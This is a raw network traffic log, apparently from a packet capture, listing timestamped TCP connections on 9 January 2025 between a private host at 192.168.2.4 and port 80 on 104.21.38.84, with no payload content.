Jan 9, 2025 18:12:34.627878904 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.702256918 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.703064919 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.703085899 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.707845926 CET	80	49762	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.707922935 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.707998037 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.710145950 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.710191965 CET	80	49761	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.710201025 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.710246086 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.712742090 CET	80	49762	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.065736055 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.070985079 CET	80	49762	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.171358109 CET	80	49762	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.221613884 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.380691051 CET	80	49762	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.424680948 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.497706890 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.502648115 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.502748966 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.502809048 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.507536888 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.862447977 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:35.867450953 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:35.956084013 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.002845049 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.192491055 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.237250090 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.307565928 CET	49762	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.311315060 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.311984062 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.316893101 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.317033052 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.317133904 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.317293882 CET	80	49763	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.317375898 CET	49763	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.321912050 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.674880981 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:36.679784060 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.814330101 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:36.862198114 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.030683994 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.081079006 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.160093069 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.160897970 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.167610884 CET	80	49764	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.167674065 CET	49764	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.167907953 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.167983055 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.168070078 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.175025940 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.518651962 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.524182081 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.640132904 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.690401077 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.837208033 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.878053904 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.955224037 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.955945969 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.961404085 CET	80	49765	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.961478949 CET	49765	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.961755991 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:37.961824894 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.961899996 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:37.966670036 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.315876961 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.321767092 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.434214115 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.487201929 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.681319952 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.721862078 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.806504011 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.806804895 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.812199116 CET	80	49767	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.812285900 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.812558889 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.812726974 CET	80	49766	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:38.814507008 CET	49766	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:38.817476034 CET	80	49767	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.159231901 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.164213896 CET	80	49767	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.273895979 CET	80	49767	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.315586090 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.363399982 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.364041090 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.369592905 CET	80	49767	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.369657993 CET	49767	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.369857073 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.369920969 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.370022058 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.375816107 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.487366915 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.492331982 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.492472887 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.492697954 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.497526884 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.721621990 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.726564884 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.726732016 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.846720934 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.851713896 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.867711067 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:39.909105062 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:39.954663992 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.002837896 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.044972897 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.096585035 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.188343048 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.237315893 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.313393116 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.313627005 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.314198017 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.318614960 CET	80	49768	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.318680048 CET	49768	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.318778038 CET	80	49769	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.318839073 CET	49769	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.318989992 CET	80	49770	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.319051981 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.319133043 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.323889971 CET	80	49770	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.674762011 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:40.680023909 CET	80	49770	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.869353056 CET	80	49770	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:40.924698114 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.076375008 CET	80	49770	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.127846003 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.204220057 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.209130049 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.209235907 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.209332943 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.214095116 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.565567017 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.570597887 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.653584957 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.705982924 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.838135004 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.893565893 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.970231056 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.971009016 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.975326061 CET	80	49771	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.975404024 CET	49771	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.975974083 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:41.976049900 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.976123095 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:41.980886936 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.331084013 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.339171886 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.441359997 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.487369061 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.766143084 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.815547943 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.900851011 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.901603937 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.906122923 CET	80	49772	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.906188011 CET	49772	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.906639099 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:42.906704903 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.906797886 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:42.911689997 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.253061056 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.258150101 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.381592989 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.424712896 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.649554968 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.690367937 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.764456987 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.765175104 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.770267963 CET	80	49773	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.770286083 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:43.770335913 CET	49773	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.770406961 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.770514011 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:43.775304079 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.127963066 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.133011103 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.237546921 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.284116030 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.505961895 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.549756050 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.632196903 CET	49770	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.650163889 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.651104927 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.655641079 CET	80	49774	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.655741930 CET	49774	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.656191111 CET	80	49775	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:44.656270981 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.656429052 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:44.661339998 CET	80	49775	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.006998062 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.012079000 CET	80	49775	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.052284002 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.052725077 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.057414055 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.057523966 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.057632923 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.058001041 CET	80	49775	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.058063030 CET	49775	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.062598944 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.366836071 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.371876001 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.371944904 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.372040987 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.376915932 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.409174919 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.414272070 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.414496899 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.617779016 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.659094095 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.721678972 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.726552010 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.847390890 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.865185976 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:45.893465996 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:45.909107924 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.427589893 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:46.471668959 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.517308950 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:46.565381050 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.644496918 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.644628048 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.645448923 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.649763107 CET	80	49776	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:46.649785042 CET	80	49777	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:46.649868011 CET	49776	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.649925947 CET	49777	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.650295973 CET	80	49778	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:46.652972937 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.653107882 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:46.657902956 CET	80	49778	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.004864931 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.009910107 CET	80	49778	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.117747068 CET	80	49778	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.159140110 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.305696011 CET	80	49778	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.346610069 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.442044973 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.447196007 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.447586060 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.447691917 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.452502012 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.800101995 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:47.805258989 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.916336060 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:47.971617937 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.582428932 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:48.627964020 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.710333109 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.711652040 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.715342045 CET	80	49779	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:48.715401888 CET	49779	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.716496944 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:48.716557980 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.716856003 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:48.721610069 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.065423012 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.070348978 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.269059896 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.315421104 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.534535885 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.580997944 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.657521963 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.658432007 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.662492990 CET	80	49780	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.662549019 CET	49780	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.663372040 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:49.663448095 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.663618088 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:49.668518066 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.018621922 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.023603916 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.169878006 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.221621990 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.434876919 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.487237930 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.567601919 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.568207979 CET	49782	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.572702885 CET	80	49781	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.572777033 CET	49781	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.573033094 CET	80	49782	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.573088884 CET	49782	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.573153019 CET	49782	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.577989101 CET	80	49782	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.863672018 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.863759995 CET	49782	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.868670940 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.868761063 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.913383961 CET	80	49782	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.915551901 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:50.920506001 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.944072008 CET	80	49782	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:50.944238901 CET	49782	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.174952984 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.179878950 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.179956913 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.186444044 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.191652060 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.276743889 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.281666040 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.281693935 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.328336000 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.377854109 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.534425974 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.539288044 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.628030062 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.674756050 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.674782038 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.721585035 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:51.896862984 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:51.940355062 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.013487101 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.013555050 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.014132023 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.019917011 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.020011902 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.020046949 CET	80	49783	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.020109892 CET	49783	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.020200014 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.020234108 CET	80	49784	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.020366907 CET	49784	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.025772095 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.378356934 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.383322954 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.499814034 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.549741030 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.923947096 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.926776886 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:52.931910038 CET	80	49785	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:52.934545994 CET	49785	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.045583010 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.050786018 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:53.052644968 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.052731037 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.057492971 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:53.409167051 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.414045095 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:53.498039961 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:53.565469980 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:53.739852905 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:53.784296036 CET	49787	80	192.168.2.4	104.21.38.84
